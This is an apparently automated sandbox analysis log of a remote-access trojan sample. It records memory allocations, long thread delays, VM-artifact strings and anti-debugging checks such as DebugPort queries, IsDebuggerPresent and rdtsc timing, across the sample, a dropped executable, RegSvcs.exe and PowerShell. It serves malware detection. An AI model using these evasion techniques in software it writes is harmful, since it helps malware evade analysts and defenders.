Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 8D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 9D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: 9F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: AF00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 2D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 8640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 9640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: 8640000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0112E0D0 rdtsc

7_2_0112E0D0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6799	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2808	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4277	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5651	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 890	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 858	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 9652	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.2 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 1.9 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe TID: 5332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe TID: 6332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep count: 4277 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep time: -8554000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep count: 5651 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3300	Thread sleep time: -11302000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep count: 319 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep time: -638000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep count: 9652 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5332	Thread sleep time: -19304000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000009.00000000.2154297535.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000009.00000002.4578457861.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2163252366.0000000008C55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\Y
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.4578457861.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000009.00000000.2139208430.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0112E0D0 rdtsc

7_2_0112E0D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_01172B60 LdrInitializeThunk,

7_2_01172B60

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_007225B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

15_2_007225B2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01160124 mov eax, dword ptr fs:[00000030h]	7_2_01160124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C156 mov eax, dword ptr fs:[00000030h]	7_2_0112C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136154 mov eax, dword ptr fs:[00000030h]	7_2_01136154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136154 mov eax, dword ptr fs:[00000030h]	7_2_01136154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132140 mov ecx, dword ptr fs:[00000030h]	7_2_01132140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132140 mov eax, dword ptr fs:[00000030h]	7_2_01132140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172160 mov eax, dword ptr fs:[00000030h]	7_2_01172160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01170185 mov eax, dword ptr fs:[00000030h]	7_2_01170185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0118E1D8 mov eax, dword ptr fs:[00000030h]	7_2_0118E1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A01DA mov eax, dword ptr fs:[00000030h]	7_2_011A01DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A01DA mov eax, dword ptr fs:[00000030h]	7_2_011A01DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011461D1 mov eax, dword ptr fs:[00000030h]	7_2_011461D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011461D1 mov eax, dword ptr fs:[00000030h]	7_2_011461D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov ecx, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011601F8 mov eax, dword ptr fs:[00000030h]	7_2_011601F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4000 mov ecx, dword ptr fs:[00000030h]	7_2_011B4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C020 mov eax, dword ptr fs:[00000030h]	7_2_0112C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A020 mov eax, dword ptr fs:[00000030h]	7_2_0112A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132050 mov eax, dword ptr fs:[00000030h]	7_2_01132050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6050 mov eax, dword ptr fs:[00000030h]	7_2_011B6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01192045 mov eax, dword ptr fs:[00000030h]	7_2_01192045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115C073 mov eax, dword ptr fs:[00000030h]	7_2_0115C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A060 mov eax, dword ptr fs:[00000030h]	7_2_0116A060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113208A mov eax, dword ptr fs:[00000030h]	7_2_0113208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011280A0 mov eax, dword ptr fs:[00000030h]	7_2_011280A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B20DE mov eax, dword ptr fs:[00000030h]	7_2_011B20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C0F0 mov eax, dword ptr fs:[00000030h]	7_2_0112C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011720F0 mov ecx, dword ptr fs:[00000030h]	7_2_011720F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A0E3 mov ecx, dword ptr fs:[00000030h]	7_2_0112A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011380E9 mov eax, dword ptr fs:[00000030h]	7_2_011380E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B60E0 mov eax, dword ptr fs:[00000030h]	7_2_011B60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150310 mov ecx, dword ptr fs:[00000030h]	7_2_01150310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C301 mov ecx, dword ptr fs:[00000030h]	7_2_0112C301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132324 mov eax, dword ptr fs:[00000030h]	7_2_01132324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov ecx, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0119634C mov eax, dword ptr fs:[00000030h]	7_2_0119634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115438F mov eax, dword ptr fs:[00000030h]	7_2_0115438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115438F mov eax, dword ptr fs:[00000030h]	7_2_0115438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B63C0 mov eax, dword ptr fs:[00000030h]	7_2_011B63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011663FF mov eax, dword ptr fs:[00000030h]	7_2_011663FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140218 mov eax, dword ptr fs:[00000030h]	7_2_01140218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112823B mov eax, dword ptr fs:[00000030h]	7_2_0112823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A250 mov eax, dword ptr fs:[00000030h]	7_2_0112A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136259 mov eax, dword ptr fs:[00000030h]	7_2_01136259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8243 mov eax, dword ptr fs:[00000030h]	7_2_011B8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8243 mov ecx, dword ptr fs:[00000030h]	7_2_011B8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112826B mov eax, dword ptr fs:[00000030h]	7_2_0112826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E284 mov eax, dword ptr fs:[00000030h]	7_2_0116E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E284 mov eax, dword ptr fs:[00000030h]	7_2_0116E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402A0 mov eax, dword ptr fs:[00000030h]	7_2_011402A0
